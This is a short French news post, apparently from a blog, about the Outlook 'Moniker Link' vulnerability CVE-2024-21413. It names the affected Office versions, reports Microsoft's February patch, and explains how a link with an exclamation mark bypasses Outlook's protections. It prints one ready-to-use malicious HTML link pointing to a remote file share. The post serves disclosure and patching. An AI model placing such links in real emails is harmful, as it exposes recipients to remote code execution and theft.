Une faille critique a été découverte dans le logiciel de mesagerie Microsoft Outlook par Haifei Li, chercheur en sécutité de la société Check Point. Cette vulnérabilité est estampillée CVE-2024-21413. Cette vulnérabilité est critique car son exploit permet l'exécution de code arbitaire à distance sans d'autre action de l'utilisateur que cliquer sur un lien malicieux présent dans un mail contenant l'attaque.

Microsoft a publié un correctif qui fait partie du Tuesday Patch de février. Celui-ci doit être appliqué d'urgence sur les machines qui sont configurées pour ne pas appliquer les mises à jour automatiquement. Les systèmes affectés sont :

• Microsoft Office 2016
• Microsoft Office 2019
• Microsoft Office LTSC 2021
• Microsoft 365 Apps

Cette faille est baptisée Moniker Link. Pour l'exploiter il suffit d'incorporer un simple lien malicieux dans un mail. Le lien peut ressembler à ça :

<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>

C'est la presence du point d'exclamation (!) devant la chaîne aléatoire 'something' qui déclenche l'exploit de la vulnérabilité. Un tel lien contourne la protection interne d'Outlook contre le téléchargement de ressources distantes. Un clic sur un tel lien va télécharger et ouvrir le fichier sans qu'Outlook émette le moindre avertissement. Si le fichier téléchargé est par exemple un fichier Office qui contient du code malicieux, celui-ci sera exécuté.

Cette faille est entièrement expliquée techniquement dans un très intéressant billet de Haifei Li sur le blog de Check Point.